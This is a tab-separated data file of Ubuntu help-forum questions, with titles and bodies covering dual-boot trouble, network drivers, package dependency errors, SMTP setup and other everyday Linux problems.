410281	is it possible to do a dual boot for acer iconia w700 ?	i 'm afraid to do this on my own , because this is my daily driver . anyone have any instructions of a video that could guide me . help ! ! ! windows is killing me ... .
410282	finding active eth port while installing ubuntu server	at work i was just tasked to rebuild a testbed of 80+ systems and each system has 20 10g interfaces , the they all need ubuntu 12.04.02 server x64 to be installed on them . i do not have physical access to the , only lo / cimc access to them so its almost the same as having direct console access . this would be a simple scripting , but i ran into a catch . the group of interns that installed all them did not keep the same eth port . when installing it looks like they rolled a d20 and installed the switch 10g connection on what number came up . maybe there is a pattern , but i can not see one . the first 6 systems have connections as follows . : eth0 , eth2 , eth3 , eth0 , eth10 , eth14 . if you see a pattern , let me know ! when installing i need to detect the only active ethernet interface . in fedora i would normally use ethtool or ethtool-lite and script an installer . the ubuntu server installer does not seem to have this . and before you ask , i do not have switch access for these systems so matching mac addresses to switch logs will not work .
410284	what is the solution for error 13 invalid or unsupported executable format ?	i am using windows 7 and linux ubuntu operating system in my machine as dual os.it worked fine for some time . but suddenly when i try to boot windows os . the grub error comes like this . error 13 : invalid or unsupported executable format and it is not getting booted . what is the solution for this error.. how can i get rid of this error from my pc .
410285	dual boot with windows 7 ssd/hdd uefi	pc config core i7 , b85m-d3h , ssd 128gb,1tb hdd , window on sdd and ubuntu should be in 100 gb drive of hdd . i did normal way , windows boots .
410286	shutdown ubuntu 12.04 desktops on network by a script ?	i have 5 ubuntu 12.04 desktops connected by network , can i make a script to shutdown them from my laptop that also have ubuntu 12.04 ? so that make it easy and reduce time and effort to shutdown them locally . i do n't need to connect to each user manually by ssh and write down each username and password every time . any help ?
410287	how could i set the apache dns ?	i have an ubuntu server 13.10 and i think that i 'm having problems with the apache/php dns . the computer has a perfect connectivity . i can send mails from shell with php , but i ca n't send from the php web page . same problem trying to download a web page with php . i created this little php web : < ? php error_reporting ( e_all ) ; ini_set ( 'display_errors ' , true ) ; $ page = file_get_contents ( `` http : //google.com '' ) ; ? > it 's working running from the shell , but it 's returning this from the browser http : //mydomain.com/test.php : warning : file_get_contents ( ) : **php_network_getaddresses : getaddrinfo failed : name or service not known** in /var/www/test.php on line 4 warning : file_get_contents ( http : //google.com ) : failed to open stream : php_network_getaddresses : getaddrinfo failed : name or service not known in /var/www/test.php on line 4 my config files are : user @ server : ~ $ sudo cat /etc/resolv.conf nameserver 192.168.0.1 user @ server : ~ $ sudo cat /etc/network/interfaces auto lo eth0 iface lo inet loopback iface eth0 inet dhcp user @ server : ~ $ sudo cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 server any idea please ? thanks in advance !
410288	conky harmattan is surrounded by the previews wallpaper	this is an amazing eye-candy but i 'm facing a problem . i installed it in my ubuntu 13.10 64b but conky is surrounded by a a black box , but it 's not a black box at all is the previews wallpaper i had setup . if i change the wp then the 'black ' box changes for a copy of the previews wp . is someone else having this problem ? . i 'm using unity
410293	indicator-sound not visible at startup , 13.10	my indicator-sound is not visible at startup if and only if i start muted . if i start with sound enabled ( i.e . unmuted ) it is visible at startup . by increasing the sound with the hardware-keys , the indicator appears and stays visible even if i turn off the sound again . sound works flawlessly tough ... even if this seems to be a minor but , it annoys me , thus any help appreciated ! i 'm running 13.10
410295	run filezilla package	i 'm new on debian and linux , i installed filezilla but i do n't know how to run it . whene i execute : dpkg -l | grep -i `` filezilla '' i get ii filezilla-common 3.7.3-1 all architecture independent files for filezilla so i guess it installed . thank you
410298	problem creating ext4 partition	i can format partition to linux-swap and ntfs , but ca n't for ext4 . i did boot on a ubuntu usbkey in `` try ubuntu '' mode . /dev/sda1 was unmounted here is gparted reports : gparted 0.11.0 -- enable-libparted-dmraid libparted 2.3 format /dev/sda1 as ext4 00:00:02 ( error ) calibrate /dev/sda1 00:00:00 ( success ) path : /dev/sda1 start : 2,048 end : 1,458,862,079 size : 1,458,860,032 ( 695.64 gib ) set partition type on /dev/sda1 00:00:01 ( success ) new partition type : ext4 create new ext4 file system 00:00:01 ( error ) mkfs.ext4 -j -o extent -l `` '' /dev/sda1 filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 45596672 inodes , 182357504 blocks 9117875 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=0 5566 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 allocating group tables : done writing inode tables : done creating journal ( 32768 blocks ) : mke2fs 1.42 ( 29-nov-2011 ) ext2fs_check_if_mount : input/output error while determining whether /dev/sda1 is mounted . mkfs.ext4 : input/output error while trying to create journal
410299	problem with ethernet ( alx ) . where to start ?	i 'm experiencing problem with my internet connection . i have a asus n56v , and following this link , i 've installed alx driver . i 'm using ethernet connection almost every days during the last year . now , i moved to switzerland and i 'm experiencing some problems ... my internet connection stops randomly without any evident reasons . my network manager applet ( nm-applet ) shows that ethernet is connected , even when internet does not work . to solve this , i have to unplug and replug my ethernet cable , and everything works ... until the next stop ! so i have to unplug/replug again and again ... i tried to use windows 7 , installed on the same pc , and internet connection is always working fine , i do n't experience any problem . i do n't know why this is happening and i do n't know where to start to try to solve this problem . i need linux since i feel sick using win . please , any suggestions is appreciated !
410301	assigning grep output to a variable	in a terminal i type : grep ' < td > < a href= '' http : //www.blabla.cc ' file.txt works fine . but if i type : var= `grep ' < td > < a href= '' http : //www.blabla.cc ' file.txt` i am unable to extract the variable , the result is : < td > < a : can not find command i tried a backslash before the space `` href '' but echo $ var shows an empty line . any suggestions ?
410302	how well does ubuntu run on the lenovo y510p ?	so i want to install ubuntu on my new laptop , a lenovo ideapad y510p . it 's a great laptop , pre-loaded with all the latest cool stuff like windows 8 and uefi and everything . obviously , this is al nice but now i am wondering how hard it is to install ubuntu on this machine . as you may know , ubuntu + uefi do n't really play well with each other . above that , this system is equipped with a nvidia gtx 755 together with the intel gpu on the processor together with nvidia 's `` optimus '' technology ( which basically switches between the internal and nvidia card depending on load ) . now i heard this also does n't always work on linux . so basically , i am wondering if other people own this laptop and have successfully installed ubuntu on this . also , how well does this optimus thing work with ubuntu ? i hope someone can answer this for me ! edit : i just found out about bumblebee which seems to be a possible solution.. anyone has experience with that ? ~ gladen
410303	ssd from windows drive to external drive under ubuntu	my ssd samsung 840 was used as os drive for a windows 7 based machine . i want to use it now as external ssd drive under ubuntu . i formatted it with gparted to remove recovery partitions of windows ( that were unallocated ) . i have noticed that now the disk is much slower than before formatting . what do i have to do ? thanks !
410310	black screen on start	installed windows windows installer and when i boot ubuntu the screen goes blank with a command prompt style screen . i can type but it does n't load ?
410313	output directory contents to file	i have a directory html . i would like to output the files of the directory , including the path , to a file . you can do something like this with the command : ls -r scripts/html > out.txt but the results are like : scripts/html 1.html 2.html ... i would like the result as : scripts/html/1.html scripts/html/2.html ...
410314	troubles with pinnacle usb pctv 290e	i have a pinnacle pctv 290e usb2 stick and run it under ubuntu 13.10 . this tv-stick has 2 frontends , frontend0 as dvb-t and frontend1 as dvb-c i need frontend1 for dvb-c , but i can see only the frontend0 . can you please help me ? thanks & regards
410316	defragging the hardrive	after i partition the drive for ubuntu and windows , can i use the windows defrag utility on the ubuntu partition , or do i defrag each with their own utilities ? i am planning on installing version 12.04 lts with win7 pro 64-bit .
410317	lenovo thinkpad s440 network	does anybody know how to configure wi-fi on a lenovo thinkpad s440 with ubuntu 12.04 lts ? i ca n't configure it even with lan . wi-fi is the first thing i need . i ca n't find any drivers for linux . as i see it from ( official specs link ) ubuntu uses `` realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller '' to establish network . can anybody suggest a solution ? a driver , a way to configure wi-fi or anything ? $ lspci -nn | grep 0280 04:00.0 network controller [ 0280 ] : intel corporation device [ 8086:08b2 ] ( rev 73 )
410318	can not edit slides on libre impress	a student of mine is working on a presentation for a report . the other day , he opened his slideshow and the slides appeared horizontally . the slides are beside each other instead of on top of each other . i put it to normal view and nothing has changed . while the slides are arranged this way , he can not edit any of the slides . how do i fix this ?
410326	using openvpn server with network manager	my 13.10 system has its network devices managed by networkmanager so the network devices and configuration do n't show up in /etc/network/interfaces . i want to bring up an openvpn server but the instructions i can find sets up the configuration in the interfaces file . will this work with netmanager or is there some other procedure to follow ?
410327	weird issues with syslog-ng and apt-get	so , i had a weird scenario just happen and i was just hoping someone might know what happened for my own edification . basically , a while back i installed syslog-ng v 3.3.6 using sudo apt-get install syslog-ng i wanted to update my version of syslog-ng that i was running but after running install and checking : sudo syslog-ng -v it said it was still running 3.3.6 . even when i ran an sudo apt-get remove syslog-ng the output would say it was removing but syslog was still running on the machine and still said it was running 3.3.6 . i updated my sources.list to point to the unofficial repos as per this link . updated my apt-get and then ran sudo apt-get remove libsyslog-ng-3.3.6 it removed 3.3.6 and installed 3.4.7 , which is what i wanted to happen but i 'm just really not sure why all of the above happened . specifically , why did n't it actually remove syslog-ng ? and why did it remove 3.3.6 and auto-install 3.4.7 ?
410330	how can i install and configure an smtp server ?	how can i go about setting up an smtp server to send email as * @ mydomain.com ? how can i then use this smtp server with a php script that grabs data posted from my website 's contact form and send it to me as an email ? i 'm using ubuntu 13.10 and webmin , but i can do the changes locally on the server . here is my php script.. # ! /var/www/php < ? php if ( isset ( $ _post [ 'email ' ] ) ) { $ email_to = `` havok @ havoksecurity.com '' ; $ email_subject = `` havok security contact form '' ; function died ( $ error ) { // your error code can go here echo `` we are very sorry , but there was an error found with the form you submitted . `` ; echo `` these errors appear below. < br / > < br / > '' ; echo $ error . `` < br / > < br / > '' ; echo `` please go back and fix these errors. < br / > < br / > '' ; die ( ) ; } // validation expected data exists if ( ! isset ( $ _post [ 'name ' ] ) || ! isset ( $ _post [ 'email ' ] ) || ! isset ( $ _post [ 'phone ' ] ) || ! isset ( $ _post [ 'message ' ] ) ) { died ( 'we are sorry , but there appears to be a problem with the form you submitted . ' ) ; } $ first_name = $ _post [ 'name ' ] ; // required $ email_from = $ _post [ 'email ' ] ; // required $ telephone = $ _post [ 'phone ' ] ; // not required $ comments = $ _post [ 'message ' ] ; // required $ error_message = `` '' ; $ email_exp = '/^ [ a-za-z0-9._ % - ] + @ [ a-za-z0-9.- ] +\ . [ a-za-z ] { 2,4 } $ / ' ; if ( ! preg_match ( $ email_exp , $ email_from ) ) { $ error_message .= 'the email address you entered does not appear to be valid. < br / > ' ; } $ string_exp = `` /^ [ a-za-z . '- ] + $ / '' ; if ( ! preg_match ( $ string_exp , $ name ) ) { $ error_message .= 'the name you entered does not appear to be valid. < br / > ' ; } if ( strlen ( $ message ) < 2 ) { $ error_message .= 'the message you entered do not appear to be valid. < br / > ' ; } if ( strlen ( $ error_message ) > 0 ) { died ( $ error_message ) ; } $ email_message = `` form details below.\n\n '' ; function clean_string ( $ string ) { $ bad = array ( `` content-type '' , '' bcc : '' , '' to : '' , '' cc : '' , '' href '' ) ; return str_replace ( $ bad , '' '' , $ string ) ; } $ email_message .= `` name : `` .clean_string ( $ name ) . `` \n '' ; $ email_message .= `` email : `` .clean_string ( $ email_from ) . `` \n '' ; $ email_message .= `` phone : `` .clean_string ( $ phone ) . `` \n '' ; $ email_message .= `` message : `` .clean_string ( $ message ) . `` \n '' ; // create email headers $ headers = 'from : '. $ email_from. '' \r\n '' . 'reply-to : '. $ email_from . `` \r\n '' . 'x-mailer : php/ ' . phpversion ( ) ; @ mail ( $ email_to , $ email_subject , $ email_message , $ headers ) ; ? > < ! -- include your own success html here -- > < link rel= '' stylesheet '' type= '' text/css '' media= '' screen '' href= '' css/reset.css '' > < link rel= '' stylesheet '' type= '' text/css '' media= '' screen '' href= '' css/style.css '' > < script src= '' js/jquery-1.7.min.js '' > < /script > < script src= '' js/jquery.easing.1.3.js '' > < /script > < script src= '' js/ff-cash.js '' > < /script > < p > & nbsp ; < /p > < p > < img src= '' images/security_logo.png '' width= '' 596 '' height= '' 190 '' alt= '' security_logo '' longdesc= '' http : //havoksecurity.com '' / > < img src= '' images/twitter_icon-1.png '' width= '' 24 '' height= '' 24 '' alt= '' twitter_icon '' / > < img src= '' images/facebook_icon-2.png '' width= '' 24 '' height= '' 24 '' alt= '' facebook_icon '' / > < img src= '' images/google_icon-3.png '' width= '' 24 '' height= '' 24 '' alt= '' google_icon '' / > < /p > < p > & nbsp ; < /p > < p > thank you for contacting us . we will respond within 24 hours . < ? php } ? > < /p > i have installed iredmail , on a fresh install of ubuntu 12.4 but it wont send or recieve emails . so it seems i 'll have to figure that out before i can make it use this php script . all help would be very appreciated . i just tried top send a message so i can see the error here is the error log feb 5 00:53:27 havoksecurity postfix/smtpd [ 8193 ] : connect from unknown [ 192.168.1.126 ] feb 5 00:53:53 havoksecurity postfix/smtpd [ 8193 ] : lost connection after unknown from unknown [ 192.168.1.126 ] feb 5 00:53:53 havoksecurity postfix/smtpd [ 8193 ] : disconnect from unknown [ 192.168.1.126 ] feb 5 00:57:13 havoksecurity postfix/anvil [ 8195 ] : statistics : max connection rate 1/60s for ( smtp:192.168.1.126 ) at feb 5 00:53:27 feb 5 00:57:13 havoksecurity postfix/anvil [ 8195 ] : statistics : max connection count 1 for ( smtp:192.168.1.126 ) at feb 5 00:53:27 feb 5 00:57:13 havoksecurity postfix/anvil [ 8195 ] : statistics : max cache size 1 at feb 5 00:53:27 feb 5 01:10:45 havoksecurity postfix/pickup [ 7985 ] : ddeacd40fd2 : uid=0 from= < havok @ havoksecurity.com > feb 5 01:10:45 havoksecurity postfix/cleanup [ 9202 ] : ddeacd40fd2 : message-id= < 1391580645.9181 @ havoksecurity.com > feb 5 01:10:45 havoksecurity postfix/qmgr [ 1687 ] : ddeacd40fd2 : from= < havok @ havoksecurity.com > , size=641 , nrcpt=1 ( queue active ) feb 5 01:10:46 havoksecurity amavis [ 1412 ] : ( 01412-06 ) notice : reconnecting in response to : err=2006 , hy000 , dbd : :mysql : :st execute failed : mysql server has gone away at ( eval 100 ) line 166 , < gen37 > line 1834 . feb 5 01:10:47 havoksecurity postfix/smtpd [ 9211 ] : connect from localhost [ 127.0.0.1 ] feb 5 01:10:47 havoksecurity postfix/trivial-rewrite [ 9204 ] : warning : do not list domain havoksecurity.com in both mydestination and virtual_mailbox_domains feb 5 01:10:47 havoksecurity postfix/smtpd [ 9211 ] : 527e6d40f94 : client=localhost [ 127.0.0.1 ] feb 5 01:10:47 havoksecurity postfix/cleanup [ 9202 ] : 527e6d40f94 : message-id= < 1391580645.9181 @ havoksecurity.com > feb 5 01:10:47 havoksecurity postfix/qmgr [ 1687 ] : 527e6d40f94 : from= < havok @ havoksecurity.com > , size=1098 , nrcpt=1 ( queue active ) feb 5 01:10:47 havoksecurity postfix/smtpd [ 9211 ] : disconnect from localhost [ 127.0.0.1 ] feb 5 01:10:47 havoksecurity amavis [ 1412 ] : ( 01412-06 ) passed clean , myusers < havok @ havoksecurity.com > - > < user @ gmail.com > , message-id : < 1391580645.9181 @ havoksecurity.com > , mail_id : tx8bn4bmxnig , hits : -10 , size : 641 , queued_as : 527e6d40f94 , 1404 ms feb 5 01:10:47 havoksecurity postfix/smtp [ 9207 ] : ddeacd40fd2 : to= < user @ gmail.com > , relay=127.0.0.1 [ 127.0.0.1 ] :10024 , delay=1.6 , delays=0.09/0.01/0/1.5 , dsn=2.0.0 , status=sent ( 250 2.0.0 from mta ( [ 127.0.0.1 ] :10025 ) : 250 2.0.0 ok : queued as 527e6d40f94 ) feb 5 01:10:47 havoksecurity postfix/qmgr [ 1687 ] : ddeacd40fd2 : removed feb 5 01:11:17 havoksecurity postfix/smtp [ 9219 ] : connect to gmail-smtp-in.l.google.com [ 74.125.196.27 ] :25 : connection timed out feb 5 01:11:47 havoksecurity postfix/smtp [ 9219 ] : connect to alt1.gmail-smtp-in.l.google.com [ 173.194.75.27 ] :25 : connection timed out feb 5 01:12:17 havoksecurity postfix/smtp [ 9219 ] : connect to alt2.gmail-smtp-in.l.google.com [ 173.194.78.27 ] :25 : connection timed out feb 5 01:12:47 havoksecurity postfix/smtp [ 9219 ] : connect to alt3.gmail-smtp-in.l.google.com [ 74.125.136.27 ] :25 : connection timed out feb 5 01:13:17 havoksecurity postfix/smtp [ 9219 ] : connect to alt4.gmail-smtp-in.l.google.com [ 173.194.70.27 ] :25 : connection timed out feb 5 01:13:17 havoksecurity postfix/smtp [ 9219 ] : 527e6d40f94 : to= < user @ gmail.com > , relay=none , delay=150 , delays=0.04/0.02/150/0 , dsn=4.4.1 , status=deferred ( connect to alt4.gmail-smtp-in.l.google.com [ 173.194.70.27 ] :25 : connection timed out )
410331	garbled caps/lowercase on sony vaio vgn-fs485b	i have replaced windows xp with ubuntu 12.04 on my 2006 sony vaio ( model pcg-7l1m vgn-fs485b , 1.73 ghz cpu , ram upgraded to 2gb ) . it went ok and i was happy until : firefox needed to open a new window rather than a new tab every time i opened a link . it developed a problem with upper and lower case so that it looked like the caps lock was stuck on , but actually it 's intermittent . for example pressing “a” and holding it down would give something like : aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa” . same sort of thing with caps lock on . with numerals i can only get ! `` £ $ % ^ & * ( ) etc . holding down shift gives just capitals . now that had never happened with xp which was running well before i changed , so i do not think it is a hardware problem . the problem also sometimes corrects itself after a reboot . using an external keyboard does the same thing . any ideas ? maybe i need to install a driver for the keyboard ?
410336	no such file or directory when installing liblinear for use on ubuntu in matlab	matlab version is 2010a student version ( 32 bit ) , ubuntu version is 13.04 , 64 bit . i first use make in the directory liblinear-1.94 . this step works . then i cd into the matlab directory and attempt to use make . the error is as follows : /usr/bin/ld : can not open linker script file /usr/local/matlabr2010a/extern/lib/glnxa64/mexfunction.map : no such file or directory collect2 : error : ld returned 1 exit status mex : link of ' `` train.mexa64 '' ' failed . make : *** [ train.mexa64 ] error 1 i basically know why the error exists but do n't know how to fix it . there is no folder called glnxa64 . instead , there is a folder called glnx86 . this is because my version of matlab is 32 bit , but ubuntu is 64 bit . it seems that the make file is trying to access a folder that would exist if matlab was the 64 bit version . any ideas on how to fix this ?
410337	ca n't connect to the net with rtl8111/8168b from realtek	i 've successfully installed ubuntu 12.04 and am unable to connect to a wired connection ( cat5e ) using my realtek ethernet controller . it is version rtl8111/8168b pci express gigabit controller ( rev 06 ) . i 've tried changing the driver to use r8168 but that has been unsuccessful as described here and here . the kernel drivers and module in use is r8168 . i have tried everything i know how to do , but still no luck . does anyone have any suggestions ? thanks in advance .
410341	what software is available for book publishing ?	can anyone offer advice on a program for compiling and publishing a book ? i have scribus but am having a rough time with it . i was very good with quark ... i need something that has style sheets , page numbers , contents . if scribus is the best for those purposes , i guess i 'll have to keep working with it but as of now i really hate it .
410350	no sound in sega genesis emulator fusion	please note that i have megadriver ii and i own the games i want to try on pc . i am running ubuntu 13.10 and using fusion 363 before i re installed my ubuntu 13.10 i used to have sound in this emulator but after reinstall i could not get sound . can someone help me with this ? ? thank you in advanced
410351	issues installing netflix-desktop	i installed the netflix desktop client and clicked on the icon , but i lost my internet connection during the wine installations . i tried to purge it and reinstall , but now when i click on the icon , nothing happens . i 'm running ubuntu 12.04 and i 've had it on this computer already , but had to reinstall ubuntu .
410356	opengl could not find entry point when running cs : s or any steam games	the names explains most of it . i am using a brand new amd cpu and gpu . i installed all of the correct drivers and still is troubling me . basic specs : cpu : amd athlon x4 760k gpu : amd r9 270x if there is anything else you need to know just ask .
410357	virtual box hangs when restarting after completing the installation of 12.04 ?	i am using virtual box 4.3.6 and am installing ubuntu lts 12.04.3 , on a windows 8 pc . i use the default 8gb disk space , and 512mb ram . however , the vm keeps hanging when i click `` restart now '' after the install completes ... i have also lowered/adjusted the cpu execution cap to 50 % , but to no avail . does anybody have any idea what could be causing this issue and how i can resolve it ?
410369	ipod iphone sync media files	how can i sync media files ( like itunes in windows ) in ubuntu ? mine is ipod touch 5 , ios 7
410376	phone calendar & addressbook synchronisation	the jolla ( sailfish os ) phone unfortunately does not support caldav/carddav synchronisation yet , but i would like to synchronise the gnu/linux phone with my gnu/linux ubuntu ( e.g . evolution calendar & contacts ) . - but actually i am not asking for a specific solution ( jolla < -- > ubuntu ) . is there a general `` roadmap '' for the future gnu/linux applications development to support pim ( calendar , addressbook & tasks ) on a broad range ( e.g . local sync , network sync for many different devices ) ? how will the future gnu/linux ubuntu phone handle it ? - will it synchronise to some nebulous server cluster ? configuring a sustainable and reliable gnu/linux pim environment ( desktop computer < -- > notebook < -- - > caldav server < -- - > smartphone ) seems to be a painful intention . this question is in relation to the following posts : task reminder applet caldav supported task reminder carddav supported address book mail client independent address and calendar program
410378	operating system not found after shut down	i recently broke my harddrive , so i 'd put a new one in and installed ubuntu 13.10 on it through liveusb , but the pc could not find the operating system . i have a acer emachines e640 , with amd64 processor . so i did some research here and found out that i should install grub and mbr , so i did by installing the boot-repair . i ran the application and rebooted . now here 's my problem , the first time booting up worked , booting me up to ubuntu , but then i shut down the pc later to see that same operating system not found message . i am here asking for what could be the problem ?
410379	can i install ubuntu on my asus me302c-a1-bl as a standalone os ?	i 've just switched from an ipad 2 to an asus memo pad and so far i am not as impressed as i had hoped with the android system . i do n't have flash and there is a lot of pre-installed junk on the tablet . i saw the video of ubuntu on the site and the operating system looked clean and easy to use . i am no pro when it comes to installing software that involves too many steps . i was wondering if there was as easy way to install ubuntu as a stand alone operating system on my tablet and would it have all of the functionality that i enjoyed from say my ipad . i am not an apple snob , but when i had my ipad i did n't need for much else . can i install ubuntu on my asus me302c-a1-bl as a standalone os ?
410380	error installing sdl2 on lubuntu 12.10	trying to install the love game engine but i seem to be unable to install the sdl2 . i get an error about its dependencies . i googled around and tried to purge but it did n't work . how can i fix/properly install sdl2 ? i tried the -f , but did n't work $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libsdl2.0debian the following new packages will be installed : libsdl2.0debian 0 upgraded , 1 newly installed , 0 to remove and 6 not upgraded . 9 not fully installed or removed . need to get 0 b/346 kb of archives . after this operation , 954 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 302833 files and directories currently installed . ) unpacking libsdl2.0debian : amd64 ( from ... /libsdl2.0debian_2.0-20130310-2~quantal1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libsdl2.0debian_2.0-20130310-2~quantal1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/libsdl2-2.0.so.0.0.0 ' , which is also in package libsdl2-2.0-0 : amd64 2.0.0+dfsg1-quantal1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libsdl2.0debian_2.0-20130310-2~quantal1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( the output for liblove : $ sudo apt-get install liblove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : liblove : depends : libluajit-5.1-2 but it is not going to be installed depends : libphysfs1 ( > = 1.1.1 ) but it is not going to be installed depends : libsdl2 ( > = 2.0.1 ) but it is not going to be installed depends : libphysfs-1.0-0 libsdl2-image1.2 : depends : libsdl2.0debian but it is not going to be installed libsdl2-mixer1.2 : depends : libsdl2.0debian but it is not going to be installed libsdl2.0-dev : depends : libsdl2.0debian ( = 2.0-20130310-2~quantal1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . [ edit ] @ avinash sudo dpkg -r libsdl2-2.0-0 dpkg : warning : ignoring request to remove libsdl2-2.0-0 : amd64 , only the config files of which are on the system ; use -- purge to remove them too [ edit2 ] when i try to install the dependencies for liblove/love this is the output reading package lists ... done building dependency tree reading state information ... done autotools-dev is already the newest version . autotools-dev set to manually installed . build-essential is already the newest version . libflac-dev is already the newest version . libogg-dev is already the newest version . libvorbis-dev is already the newest version . pkg-config is already the newest version . libdevil-dev is already the newest version . libopenal-dev is already the newest version . libfreetype6-dev is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libsdl2-dev : depends : libsdl2 ( = 2.0.1ppa1quantal1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
410381	constant humming noise	i am a relatively new user to ubuntu and recently installed 12.04 and realized when my power cord is disconnected there is this odd humming noise coming from my computer , this noise is not present when i boot to windows and also this noise stops while sound settings is up , however when i close the sound setting the sound persists . i have tried a few possibly solutions to no avail ... .any suggestions ?
410383	cant install gnome on 13.10	after i run the command sudo add-apt-repository ppa : gnome3-team/gnome3-next & & sudo apt-get update i get these messages w : failed to fetch http : //ppa.launchpad.net/sunab/kdenlive-release/ubuntu/dists/saucy/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/sunab/kdenlive-release/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/sunab/kdenlive-release/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i thought it might have just been a bad install of ubuntu so is there a way i can flash ubuntu over the top of the 13.10 i 'm running now without it deleting all of my stuff ? i 've had to reinstall ubuntu a few times already and dont want to have to reinstall everything i want .
410385	saving to different external drive	when saving a file to another external drive ( as backup ) i often but not always get this message . error saving the document ( document name ) : object not accessible . the object can not be accessed due to insufficient user rights normally i can go to directory & copy ( save ) it by ckick & drag to the other drive . ubuntu 13.10 hp pro 3130 mt 1.9 gb memory intel core i7 cpu 870 @ 2.93ghz x8 os type 64-bit disk 490.1 gb
410389	failed update from 12.10 to 13.04 , boots into terminal .	something went wrong when i was upgrading from ubuntu 12.10 to 13.04 . when the screen comes up i get an option to load ubuntu with various versions of linux and if i select one i get nothing but terminal . i think the network is having trouble connecting , because all kinds of downloads that should work are having problems . what should i do ? the computer in question has no optical drive at the moment but i could theoretically put the old floppy drive back in .
410390	install windows 7	i 'm running ubuntu 13.10 . but i guess i need to go back to windows 7 . its so easy to install ubuntu from a bootable usb because of a program . but i ca n't find any similar windows program that i 've used to install ubuntu that runs on ubuntu . can i still install windows 7 ? i do have the windows 7 iso file with me . help please .
410391	need help to partition drive	ok so im in a little problem ... i need to switch back to windows but i need a drive to put it on and i know nothing about how to partition the drives do you think you guys could help ? the ideal solution would be for me to be able to dual boot between the two .
410392	problems upgrading to 12.10	i tried upgrading from ubuntu 12.04 to 12.10 and after i got done installing when i reboot it shuts of my monitor but the computer keeps running after it shows the start up screen
410395	password change comes up as password unchanged , how can i fix that ?	i try to reset my password via passed command and i enter my password and i wish to change it but it comes up as password unchanged . what is wrong , how can i fix it ?
410396	i am not technical and my system gets hacked - trying to fix/upgrade	after using command apt-get upgrade : after this operation , 80.9 kb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... dpkg : unrecoverable fatal error , aborting : syntax error : unknown group 'crontab ' in statoverride file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) after removing empathy and access prompt `` for passwords and secrets '' from the interface software updater not available on the sidebar or via search running 12.10 .
410397	how to use internet of pc ( pc is connected to internet through wifi ) to android deivice ?	the problem is my pc connected to internet through college wifi , so i can not create wifi hotspot in pc to connect with the mobile , i found some results related to that ? by bluetooth ( blueman bluetooth manager for ubuntu ) it can connect they said , but when i try it saying divice added successfully but failed to connect is there is a solution for it to connect through bluetooth , i even know about reverse tethering , but for it the android device has to be rooted , i dont wants to do that , is there any other better solution for it , because my friends are using some software in windows ( i think they said connectify ) , is there anything also for ubuntu
410398	even after editing uefi firmware settings , the pc immediately boots windows 8.1	the problem is this : i originally had a usb option in my boot menu , but i actually removed it . what happened was an installation of the vanilla version of chrome os completely failed and took me to a black and yellow console screen . after that , of course , i used a data retrieval tool on the flash drive ( 16gb ) and it is completely functional now . when i installed the ubuntu 13.1 iso to my usb through the pen disk utility , i had no errors and , as a matter of fact , there is still an ubuntu icon for my usb in my `` this pc '' screen . '' however , while i have gone to uefi settings multiple times and have set the ( new , i might have badly manually created it ) usb option as the primary boot option , the computer is still booting straight to windows 8.1 without a single stop for the ubuntu . i have turned off secure boot and fast boot . what do you think is the issue ? do i need to recreate the usb option , this time properly ? please help . also , would it just be more efficient at this point to get a blank cd and try installing it ?
410402	how do i address the issue of system program problem detected ?	i am using ubuntu 13.10 32-bit with intel core i5-3210m cpu @ 2.50ghz ă 4 and keep receiving the message system program problem detected at startup . this is a recent installation . i 'm new to ubuntu and still learning what 's inside . what can i do to address this error message ?
410404	why the `` custom setting button '' of `` ibus input method : : bopomofo '' is grey ?	i‘ve just installed the ibus input method , and i chose bopomofo as my default . but why the `` custom setting button '' of `` ibus input method : :bopomofo '' is grey ? ( i 've seen some snapshots from internet , but theirs are not grey . ) ps . the button where my cursor put is `` custom setting button ( 偏好設定 ) ''
410405	is dell bios article on ubuntu wiki outdated ?	i came across this `` immutable '' page on the wiki . according to this , dell does n't support ubuntu ? ? even if they advertise it preinstalled ? also , it seems the non-windows instructions do n't match the non-windows installation instructions , here for example . am i right in assuming the dell instructions are the correct ones for bios updates ?
410406	easy desktop icons	i would like an easy way to have most of my programmes , like chrome , firefox , emapthy , rythmnbox - on the desktop . i am running 13.10 with gnome 3 and have not found an easy solution . please is there an easy solution ?
410408	how can i rename an external drive ?	i would like to rename an external drive ( usb ) . how can i rename an external drive ?
